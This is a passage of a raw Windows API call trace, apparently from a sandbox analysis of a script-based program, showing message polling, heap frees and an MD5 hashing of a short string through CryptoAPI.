[0167.174] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0167.174] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.174] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.174] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.174] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.174] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.174] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.174] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.174] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0167.174] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.174] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.174] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0167.174] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.174] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.174] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.174] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.175] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0167.175] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0167.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8df050, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.176] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.176] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0167.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x9bd630, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.178] GetProcAddress (hModule=0x74f20000, lpProcName="CryptHashData") returned 0x74f2df36 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.179] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0167.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0167.181] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.181] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.181] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.181] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.181] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.182] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0167.182] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: 